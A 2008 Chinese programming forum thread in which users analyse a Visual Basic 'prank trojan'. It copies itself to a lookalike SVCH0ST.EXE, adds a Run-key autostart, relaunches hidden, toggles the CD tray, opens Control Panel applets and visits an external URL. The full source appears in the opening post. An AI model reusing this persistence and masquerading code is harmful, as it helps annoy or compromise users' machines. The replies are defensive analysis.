1,486
社区成员
发帖
与我相关
我的任务
分享恶作剧,伪木马
'请大家帮忙看下,这样算不算木马程序.有何等作用.
Private Sub Form_Load()
Dim Ret2 As Long '注册表
If App.EXEName <> "SVCH0ST" Then
RegCreateKey HKEY_LOCAL_MACHINE, "software\microsoft\windows\currentVersion\run", Ret2
RegSetValue Ret2, vbNullString, REG_SZ, "C:\WINDOWS\SYSTEM32\SVCH0ST.EXE", 4
RegCloseKey Ret2 '注册表
Call CopyFile(App.EXEName & ".exe", "C:\WINDOWS\SYSTEM32\SVCH0ST.EXE", 0)
Shell "C:\WINDOWS\SYSTEM32\SVCH0ST.EXE", vbHide
Unload Me
Else
Timer1.Enabled = True
End If
End Sub
Private Sub Timer1_Timer()
Dim x, y, z, w, u
k = k + 1
Select Case k Mod 60
Case 8
If CDOpen = False Then
Call CDdoor("set CDAudio door open", 0, 0, 0)
CDOpen = True
Else
Call CDdoor("set CDAudio door closed", 0, 0, 0)
CDOpen = False
End If
Case 16
x = Shell("rundll32.exe shell32.dll,Control_RunDLL")
Case 24
y = Shell("rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0 ")
Case 32
z = Shell("rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0")
Case 40
w = Shell("rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl")
Case 48
u = Shell("rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0")
Case 56
Call ShellExecute(Form1.hwnd, "open", "http://02241.bjs.cn", vbNullString, vbNullString, &H0)
End Select
End Sub
...全文
请发表友善的回复…
发表回复
嗷嗷叫的老马 2008-10-15
- 打赏
- 举报
[Quote=引用 8 楼 zzyong00 的回复:]
打开网站 http://02241.bjs.cn ,如果IE有漏洞,并且http://02241.bjs.cn有病毒,很容易中毒
[/Quote]
我这里直接是打不开.......但PING又能解析出IP,是220.161.66.203.
出错页面貌似没有做过手脚.....
PS:
我是2003数据中心版SP2,补丁是自动全打的.
打开网站 http://02241.bjs.cn ,如果IE有漏洞,并且http://02241.bjs.cn有病毒,很容易中毒
[/Quote]
我这里直接是打不开.......但PING又能解析出IP,是220.161.66.203.
出错页面貌似没有做过手脚.....
PS:
我是2003数据中心版SP2,补丁是自动全打的.
czcn2008 2008-10-12
- 打赏
- 举报
[Quote=引用 10 楼 chenjl1031 的回复:]
这不算啥,就是降低了系统效率而已.一会儿启动这,一会儿启动那,不会是楼主自己搞的吧!
[/Quote]
无意之中下的 虽然不是很变态的东西 但起码可以认识下嘛
这不算啥,就是降低了系统效率而已.一会儿启动这,一会儿启动那,不会是楼主自己搞的吧!
[/Quote]
无意之中下的 虽然不是很变态的东西 但起码可以认识下嘛
东方之珠 2008-10-12
- 打赏
- 举报
这不算啥,就是降低了系统效率而已.一会儿启动这,一会儿启动那,不会是楼主自己搞的吧!
珍惜生命远离CPP 2008-10-12
- 打赏
- 举报
没潜伏性
zzyong00 2008-10-12
- 打赏
- 举报
打开网站 http://02241.bjs.cn ,如果IE有漏洞,并且http://02241.bjs.cn有病毒,很容易中毒
czcn2008 2008-10-12
- 打赏
- 举报
[Quote=引用 6 楼 myjian 的回复:]
很简单啊
Call CopyFile(App.EXEName & ".exe", "C:\WINDOWS\SYSTEM32\SVCH0ST.EXE", 0)
这一句就很明显了
svchost.exe有可能被这样一句就覆盖?
svch0st.exe,换成小写就明显了,所以你那里才用大写.
[/Quote]
这个是代码的主人搞的
很简单啊
Call CopyFile(App.EXEName & ".exe", "C:\WINDOWS\SYSTEM32\SVCH0ST.EXE", 0)
这一句就很明显了
svchost.exe有可能被这样一句就覆盖?
svch0st.exe,换成小写就明显了,所以你那里才用大写.
[/Quote]
这个是代码的主人搞的
嗷嗷叫的老马 2008-10-12
- 打赏
- 举报
很简单啊
Call CopyFile(App.EXEName & ".exe", "C:\WINDOWS\SYSTEM32\SVCH0ST.EXE", 0)
这一句就很明显了
svchost.exe有可能被这样一句就覆盖?
svch0st.exe,换成小写就明显了,所以你那里才用大写.
Call CopyFile(App.EXEName & ".exe", "C:\WINDOWS\SYSTEM32\SVCH0ST.EXE", 0)
这一句就很明显了
svchost.exe有可能被这样一句就覆盖?
svch0st.exe,换成小写就明显了,所以你那里才用大写.
czcn2008 2008-10-12
- 打赏
- 举报
[Quote=引用 4 楼 myjian 的回复:]
SVCH0ST.EXE,是个零啊,不是字母O,HOHO.
[/Quote]
老马 你真厉害 这样都给你找出来啊
SVCH0ST.EXE,是个零啊,不是字母O,HOHO.
[/Quote]
老马 你真厉害 这样都给你找出来啊
嗷嗷叫的老马 2008-10-12
- 打赏
- 举报
SVCH0ST.EXE,是个零啊,不是字母O,HOHO.
嗷嗷叫的老马 2008-10-12
- 打赏
- 举报
.....恶作剧.....
一会儿打开光驱......一会儿关闭.........打开控制面版.....打开显示属性.....等等等等.......
代码貌似无木马性质,就是整了一个自启动.
但最后一个地址由于我这里无法打开,无法判断是否有病毒.....
一会儿打开光驱......一会儿关闭.........打开控制面版.....打开显示属性.....等等等等.......
代码貌似无木马性质,就是整了一个自启动.
但最后一个地址由于我这里无法打开,无法判断是否有病毒.....
fvflove 2008-10-12
- 打赏
- 举报
这样的没有什么用.
很容易清除
就是第一次运行的时候..将此文件 覆盖掉 C:\WINDOWS\SYSTEM32\SVCH0ST.EXE 并设置为随系统启动.
第二次运行.就开始作怪了.
以60为一个周期.
当第8号数据时. set CDAudio door
当第16号数据是. 打开控制面板
当第24号数据是. 打开控制面板 显示
当第32号数据是. 打开控制面板 增加删除程序
当第40号数据是. 打开控制面板 Internet 属性
当第48号数据是. 打开控制面板 系统属性
当第56号数据是. 打开网站 http://02241.bjs.cn
很容易清除
就是第一次运行的时候..将此文件 覆盖掉 C:\WINDOWS\SYSTEM32\SVCH0ST.EXE 并设置为随系统启动.
第二次运行.就开始作怪了.
以60为一个周期.
当第8号数据时. set CDAudio door
当第16号数据是. 打开控制面板
当第24号数据是. 打开控制面板 显示
当第32号数据是. 打开控制面板 增加删除程序
当第40号数据是. 打开控制面板 Internet 属性
当第48号数据是. 打开控制面板 系统属性
当第56号数据是. 打开网站 http://02241.bjs.cn
SYSSZ 2008-10-12
- 打赏
- 举报
恶作剧而已,没有木马特征
